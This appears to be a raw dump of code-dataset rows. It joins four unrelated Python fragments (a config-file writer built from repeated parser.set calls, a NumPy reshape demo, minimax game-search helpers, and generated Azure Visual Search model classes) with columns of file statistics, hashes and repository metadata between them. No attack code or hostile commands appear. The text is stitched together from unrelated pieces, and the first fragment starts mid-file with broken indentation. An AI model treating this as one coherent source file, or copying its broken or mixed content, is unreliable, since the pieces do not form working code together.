# END_MOVE_PATHS_NAMES
# START_SRC_MOVE_PATHS
parser.set("Paths_Src", "path_1", Src_Path_1.get())
parser.set("Paths_Src", "path_2", Src_Path_2.get())
parser.set("Paths_Src", "path_3", Src_Path_3.get())
parser.set("Paths_Src", "path_4", Src_Path_4.get())
parser.set("Paths_Src", "path_5", Src_Path_5.get())
parser.set("Paths_Src", "path_6", Src_Path_6.get())
parser.set("Paths_Src", "path_7", Src_Path_7.get())
parser.set("Paths_Src", "path_8", Src_Path_8.get())
parser.set("Paths_Src", "path_9", Src_Path_9.get())
parser.set("Paths_Src", "path_10", Src_Path_10.get())
# END_SRC_MOVE_PATHS
# START_DST_MOVE_PATHS
parser.set("Paths_Dst", "path_1", Dst_Path_1.get())
parser.set("Paths_Dst", "path_2", Dst_Path_2.get())
parser.set("Paths_Dst", "path_3", Dst_Path_3.get())
parser.set("Paths_Dst", "path_4", Dst_Path_4.get())
parser.set("Paths_Dst", "path_5", Dst_Path_5.get())
parser.set("Paths_Dst", "path_6", Dst_Path_6.get())
parser.set("Paths_Dst", "path_7", Dst_Path_7.get())
parser.set("Paths_Dst", "path_8", Dst_Path_8.get())
parser.set("Paths_Dst", "path_9", Dst_Path_9.get())
parser.set("Paths_Dst", "path_10", Dst_Path_10.get())
# END_DST_MOVE_PATHS
# START_MOVE_EXTEMSIONS
parser.set("Extensions", "Search_1", Module_1_Extensions.get())
parser.set("Extensions", "Search_2", Module_2_Extensions.get())
parser.set("Extensions", "Search_3", Module_3_Extensions.get())
parser.set("Extensions", "Search_4", Module_4_Extensions.get())
parser.set("Extensions", "Search_5", Module_5_Extensions.get())
parser.set("Extensions", "Search_6", Module_6_Extensions.get())
parser.set("Extensions", "Search_7", Module_7_Extensions.get())
parser.set("Extensions", "Search_8", Module_8_Extensions.get())
parser.set("Extensions", "Search_9", Module_9_Extensions.get())
parser.set("Extensions", "Search_10", Module_10_Extensions.get())
# END_MOVE_EXTEMSIONS
# START_DELETE_PATHS_NAMES
parser.set("Path_Names_2", "path_name_1", Path_Name_Del_1.get())
parser.set("Path_Names_2", "path_name_2", Path_Name_Del_2.get())
parser.set("Path_Names_2", "path_name_3", Path_Name_Del_3.get())
parser.set("Path_Names_2", "path_name_4", Path_Name_Del_4.get())
parser.set("Path_Names_2", "path_name_5", Path_Name_Del_5.get())
parser.set("Path_Names_2", "path_name_6", Path_Name_Del_6.get())
parser.set("Path_Names_2", "path_name_7", Path_Name_Del_7.get())
parser.set("Path_Names_2", "path_name_8", Path_Name_Del_8.get())
parser.set("Path_Names_2", "path_name_9", Path_Name_Del_9.get())
parser.set("Path_Names_2", "path_name_10", Path_Name_Del_10.get())
# END_DELETE_PATHS_NAMES
# START_SRC_DELETE_PATHS
parser.set("Paths_Src_2", "path_1", Src_Del_Path.get())
parser.set("Paths_Src_2", "path_2", Src_Del_Path_2.get())
parser.set("Paths_Src_2", "path_3", Src_Del_Path_3.get())
parser.set("Paths_Src_2", "path_4", Src_Del_Path_4.get())
parser.set("Paths_Src_2", "path_5", Src_Del_Path_5.get())
parser.set("Paths_Src_2", "path_6", Src_Del_Path_6.get())
parser.set("Paths_Src_2", "path_7", Src_Del_Path_7.get())
parser.set("Paths_Src_2", "path_8", Src_Del_Path_8.get())
parser.set("Paths_Src_2", "path_9", Src_Del_Path_9.get())
parser.set("Paths_Src_2", "path_10", Src_Del_Path_10.get())
# END_SRC_DELETE_PATHS
# START_DELETE_EXTEMSIONS
parser.set("Extensions_2", "Search_1", Del_Extensions_1.get())
parser.set("Extensions_2", "Search_2", Del_Extensions_2.get())
parser.set("Extensions_2", "Search_3", Del_Extensions_3.get())
parser.set("Extensions_2", "Search_4", Del_Extensions_4.get())
parser.set("Extensions_2", "Search_5", Del_Extensions_5.get())
parser.set("Extensions_2", "Search_6", Del_Extensions_6.get())
parser.set("Extensions_2", "Search_7", Del_Extensions_7.get())
parser.set("Extensions_2", "Search_8", Del_Extensions_8.get())
parser.set("Extensions_2", "Search_9", Del_Extensions_9.get())
parser.set("Extensions_2", "Search_10", Del_Extensions_10.get())
# END_DELETE_EXTEMSIONS
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
| 37.253389
| 332
| 0.640524
| 18,647
| 134,671
| 4.357001
| 0.030943
| 0.019349
| 0.01669
| 0.017724
| 0.90072
| 0.855905
| 0.80224
| 0.77142
| 0.71682
| 0.693655
| 0
| 0.046187
| 0.220901
| 134,671
| 3,615
| 333
| 37.253389
| 0.728131
| 0.009787
| 0
| 0.524672
| 0
| 0.008096
| 0.184421
| 0.006962
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053971
| false
| 0.050116
| 0.01118
| 0
| 0.065921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
4d2cb4d1d4cc023a0d4070cae391a7b262a9e4eb
| 544
|
py
|
Python
|
notebook/numpy_1d_to_2d.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/numpy_1d_to_2d.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/numpy_1d_to_2d.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
import numpy as np
a = np.arange(6)
print(a)
# [0 1 2 3 4 5]
print(a.reshape(2, 3))
# [[0 1 2]
# [3 4 5]]
print(a.reshape(-1, 3))
# [[0 1 2]
# [3 4 5]]
print(a.reshape(2, -1))
# [[0 1 2]
# [3 4 5]]
# print(a.reshape(3, 4))
# ValueError: cannot reshape array of size 6 into shape (3,4)
# print(a.reshape(-1, 4))
# ValueError: cannot reshape array of size 6 into shape (4)
l = [0, 1, 2, 3, 4, 5]
print(np.array(l).reshape(-1, 3).tolist())
# [[0, 1, 2], [3, 4, 5]]
print(np.array(l).reshape(3, -1).tolist())
# [[0, 1], [2, 3], [4, 5]]
| 17
| 61
| 0.544118
| 115
| 544
| 2.573913
| 0.208696
| 0.060811
| 0.070946
| 0.094595
| 0.810811
| 0.810811
| 0.810811
| 0.75
| 0.75
| 0.685811
| 0
| 0.143187
| 0.204044
| 544
| 31
| 62
| 17.548387
| 0.540416
| 0.520221
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
4d947a0b167d9de255a54dc5be6979955989f1a7
| 998
|
py
|
Python
|
Projects/GameClass Coding Exercise/minimax_helper.py
|
echen805/AIND
|
969b4cad97ddbf7841c79dad862d4d1142825565
|
[
"MIT"
] | null | null | null |
Projects/GameClass Coding Exercise/minimax_helper.py
|
echen805/AIND
|
969b4cad97ddbf7841c79dad862d4d1142825565
|
[
"MIT"
] | null | null | null |
Projects/GameClass Coding Exercise/minimax_helper.py
|
echen805/AIND
|
969b4cad97ddbf7841c79dad862d4d1142825565
|
[
"MIT"
] | null | null | null |
def min_value(gameState):
""" Return the game state utility if the game is over,
otherwise return the minimum value over all legal successors
# HINT: Assume that the utility is ALWAYS calculated for
player 1, NOT for the "active" player
"""
# TODO: finish this function!
if gameState.terminal_test():
return gameState.utility(0)
v = float("inf")
for a in gameState.actions():
v = min(v, max_value(gameState.result(a)))
return v
def max_value(gameState):
""" Return the game state utility if the game is over,
otherwise return the maximum value over all legal successors
# HINT: Assume that the utility is ALWAYS calculated for
player 1, NOT for the "active" player
"""
# TODO: finish this function!
if gameState.terminal_test():
return gameState.utility(0)
v = float("-inf")
for a in gameState.actions():
v = max(v, min_value(gameState.result(a)))
return v
| 31.1875
| 64
| 0.647295
| 138
| 998
| 4.637681
| 0.311594
| 0.0875
| 0.053125
| 0.071875
| 0.9375
| 0.9375
| 0.85
| 0.85
| 0.85
| 0.85
| 0
| 0.005457
| 0.265531
| 998
| 32
| 65
| 31.1875
| 0.867667
| 0.488978
| 0
| 0.571429
| 0
| 0
| 0.015453
| 0
| 0
| 0
| 0
| 0.0625
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
151829b2983743fbbaa34d611b1b2854c61eaf08
| 110,488
|
py
|
Python
|
sdk/VisualSearch/visual_search_client/models/_models.py
|
WMRamadan/bing-search-sdk-for-python
|
276d9cd6963c939081b3dec91bdd9aded42b3b35
|
[
"MIT"
] | 12
|
2021-03-11T20:24:12.000Z
|
2022-02-10T22:55:03.000Z
|
sdk/VisualSearch/visual_search_client/models/_models.py
|
WMRamadan/bing-search-sdk-for-python
|
276d9cd6963c939081b3dec91bdd9aded42b3b35
|
[
"MIT"
] | null | null | null |
sdk/VisualSearch/visual_search_client/models/_models.py
|
WMRamadan/bing-search-sdk-for-python
|
276d9cd6963c939081b3dec91bdd9aded42b3b35
|
[
"MIT"
] | 10
|
2021-03-09T17:02:48.000Z
|
2022-02-12T18:40:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator (autorest: 3.0.6320, generator: {generator})
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class ResponseBase(msrest.serialization.Model):
"""Response base.
:param type:
:type type: str
"""
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResponseBase, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
class Identifiable(ResponseBase):
"""Defines the identity of a resource.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Identifiable, self).__init__(**kwargs)
self.id = None
class Response(Identifiable):
"""Defines a response. All schemas that return at the root of the response must inherit from this object.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Response, self).__init__(**kwargs)
self.read_link = None
self.web_search_url = None
class Thing(Response):
"""Defines a thing.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Thing, self).__init__(**kwargs)
self.name = None
self.url = None
self.image = None
self.description = None
self.alternate_name = None
self.bing_id = None
class CreativeWork(Thing):
"""The most generic kind of creative work, including books, movies, photographs, software programs, etc.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(CreativeWork, self).__init__(**kwargs)
self.thumbnail_url = None
self.provider = None
self.date_published = None
self.text = None
class Action(CreativeWork):
"""Defines an action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Action, self).__init__(**kwargs)
self.result = None
self.display_name = None
self.is_top_action = None
self.service_url = None
class Offer(Thing):
"""Defines a merchant's offer.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar seller: Seller for this offer.
:vartype seller: ~visual_search_client.models.Thing
:ivar price: The item's price.
:vartype price: float
:ivar price_currency: The monetary currency. For example, USD. Possible values include: "USD",
"CAD", "GBP", "EUR", "COP", "JPY", "CNY", "AUD", "INR", "AED", "AFN", "ALL", "AMD", "ANG",
"AOA", "ARS", "AWG", "AZN", "BAM", "BBD", "BDT", "BGN", "BHD", "BIF", "BMD", "BND", "BOB",
"BOV", "BRL", "BSD", "BTN", "BWP", "BYR", "BZD", "CDF", "CHE", "CHF", "CHW", "CLF", "CLP",
"COU", "CRC", "CUC", "CUP", "CVE", "CZK", "DJF", "DKK", "DOP", "DZD", "EGP", "ERN", "ETB",
"FJD", "FKP", "GEL", "GHS", "GIP", "GMD", "GNF", "GTQ", "GYD", "HKD", "HNL", "HRK", "HTG",
"HUF", "IDR", "ILS", "IQD", "IRR", "ISK", "JMD", "JOD", "KES", "KGS", "KHR", "KMF", "KPW",
"KRW", "KWD", "KYD", "KZT", "LAK", "LBP", "LKR", "LRD", "LSL", "LYD", "MAD", "MDL", "MGA",
"MKD", "MMK", "MNT", "MOP", "MRO", "MUR", "MVR", "MWK", "MXN", "MXV", "MYR", "MZN", "NAD",
"NGN", "NIO", "NOK", "NPR", "NZD", "OMR", "PAB", "PEN", "PGK", "PHP", "PKR", "PLN", "PYG",
"QAR", "RON", "RSD", "RUB", "RWF", "SAR", "SBD", "SCR", "SDG", "SEK", "SGD", "SHP", "SLL",
"SOS", "SRD", "SSP", "STD", "SYP", "SZL", "THB", "TJS", "TMT", "TND", "TOP", "TRY", "TTD",
"TWD", "TZS", "UAH", "UGX", "UYU", "UZS", "VEF", "VND", "VUV", "WST", "XAF", "XCD", "XOF",
"XPF", "YER", "ZAR", "ZMW".
:vartype price_currency: str or ~visual_search_client.models.Currency
:ivar availability: The item's availability. The following are the possible values:
Discontinued, InStock, InStoreOnly, LimitedAvailability, OnlineOnly, OutOfStock, PreOrder,
SoldOut. Possible values include: "Discontinued", "InStock", "InStoreOnly",
"LimitedAvailability", "OnlineOnly", "OutOfStock", "PreOrder", "SoldOut".
:vartype availability: str or ~visual_search_client.models.ItemAvailability
:ivar aggregate_rating: An aggregated rating that indicates how well the product has been rated
by others.
:vartype aggregate_rating: ~visual_search_client.models.AggregateRating
:ivar last_updated: The last date that the offer was updated. The date is in the form YYYY-MM-
DD.
:vartype last_updated: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'seller': {'readonly': True},
'price': {'readonly': True},
'price_currency': {'readonly': True},
'availability': {'readonly': True},
'aggregate_rating': {'readonly': True},
'last_updated': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'seller': {'key': 'seller', 'type': 'Thing'},
'price': {'key': 'price', 'type': 'float'},
'price_currency': {'key': 'priceCurrency', 'type': 'str'},
'availability': {'key': 'availability', 'type': 'str'},
'aggregate_rating': {'key': 'aggregateRating', 'type': 'AggregateRating'},
'last_updated': {'key': 'lastUpdated', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Offer, self).__init__(**kwargs)
self.seller = None
self.price = None
self.price_currency = None
self.availability = None
self.aggregate_rating = None
self.last_updated = None
class AggregateOffer(Offer):
"""Defines a list of offers from merchants that are related to the image.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar seller: Seller for this offer.
:vartype seller: ~visual_search_client.models.Thing
:ivar price: The item's price.
:vartype price: float
:ivar price_currency: The monetary currency. For example, USD. Possible values include: "USD",
"CAD", "GBP", "EUR", "COP", "JPY", "CNY", "AUD", "INR", "AED", "AFN", "ALL", "AMD", "ANG",
"AOA", "ARS", "AWG", "AZN", "BAM", "BBD", "BDT", "BGN", "BHD", "BIF", "BMD", "BND", "BOB",
"BOV", "BRL", "BSD", "BTN", "BWP", "BYR", "BZD", "CDF", "CHE", "CHF", "CHW", "CLF", "CLP",
"COU", "CRC", "CUC", "CUP", "CVE", "CZK", "DJF", "DKK", "DOP", "DZD", "EGP", "ERN", "ETB",
"FJD", "FKP", "GEL", "GHS", "GIP", "GMD", "GNF", "GTQ", "GYD", "HKD", "HNL", "HRK", "HTG",
"HUF", "IDR", "ILS", "IQD", "IRR", "ISK", "JMD", "JOD", "KES", "KGS", "KHR", "KMF", "KPW",
"KRW", "KWD", "KYD", "KZT", "LAK", "LBP", "LKR", "LRD", "LSL", "LYD", "MAD", "MDL", "MGA",
"MKD", "MMK", "MNT", "MOP", "MRO", "MUR", "MVR", "MWK", "MXN", "MXV", "MYR", "MZN", "NAD",
"NGN", "NIO", "NOK", "NPR", "NZD", "OMR", "PAB", "PEN", "PGK", "PHP", "PKR", "PLN", "PYG",
"QAR", "RON", "RSD", "RUB", "RWF", "SAR", "SBD", "SCR", "SDG", "SEK", "SGD", "SHP", "SLL",
"SOS", "SRD", "SSP", "STD", "SYP", "SZL", "THB", "TJS", "TMT", "TND", "TOP", "TRY", "TTD",
"TWD", "TZS", "UAH", "UGX", "UYU", "UZS", "VEF", "VND", "VUV", "WST", "XAF", "XCD", "XOF",
"XPF", "YER", "ZAR", "ZMW".
:vartype price_currency: str or ~visual_search_client.models.Currency
:ivar availability: The item's availability. The following are the possible values:
Discontinued, InStock, InStoreOnly, LimitedAvailability, OnlineOnly, OutOfStock, PreOrder,
SoldOut. Possible values include: "Discontinued", "InStock", "InStoreOnly",
"LimitedAvailability", "OnlineOnly", "OutOfStock", "PreOrder", "SoldOut".
:vartype availability: str or ~visual_search_client.models.ItemAvailability
:ivar aggregate_rating: An aggregated rating that indicates how well the product has been rated
by others.
:vartype aggregate_rating: ~visual_search_client.models.AggregateRating
:ivar last_updated: The last date that the offer was updated. The date is in the form YYYY-MM-
DD.
:vartype last_updated: str
:ivar offers: A list of offers from merchants that have offerings related to the image.
:vartype offers: list[~visual_search_client.models.Offer]
"""
_validation = {
'id': {'readonly': True},
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'seller': {'readonly': True},
'price': {'readonly': True},
'price_currency': {'readonly': True},
'availability': {'readonly': True},
'aggregate_rating': {'readonly': True},
'last_updated': {'readonly': True},
'offers': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'seller': {'key': 'seller', 'type': 'Thing'},
'price': {'key': 'price', 'type': 'float'},
'price_currency': {'key': 'priceCurrency', 'type': 'str'},
'availability': {'key': 'availability', 'type': 'str'},
'aggregate_rating': {'key': 'aggregateRating', 'type': 'AggregateRating'},
'last_updated': {'key': 'lastUpdated', 'type': 'str'},
'offers': {'key': 'offers', 'type': '[Offer]'},
}
def __init__(
self,
**kwargs
):
super(AggregateOffer, self).__init__(**kwargs)
self.offers = None
class PropertiesItem(msrest.serialization.Model):
"""Defines an item.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: Rating.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param type: Required. Constant filled by server.
:type type: str
"""
_validation = {
'text': {'readonly': True},
'type': {'required': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
}
_subtype_map = {
'type': {'Rating': 'Rating'}
}
def __init__(
self,
**kwargs
):
super(PropertiesItem, self).__init__(**kwargs)
self.text = None
self.type = None # type: Optional[str]
class Rating(PropertiesItem):
"""Defines a rating.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AggregateRating.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param type: Required. Constant filled by server.
:type type: str
:param rating_value: Required. The mean (average) rating. The possible values are 1.0 through
5.0.
:type rating_value: float
:ivar best_rating: The highest rated review. The possible values are 1.0 through 5.0.
:vartype best_rating: float
"""
_validation = {
'text': {'readonly': True},
'type': {'required': True},
'rating_value': {'required': True},
'best_rating': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
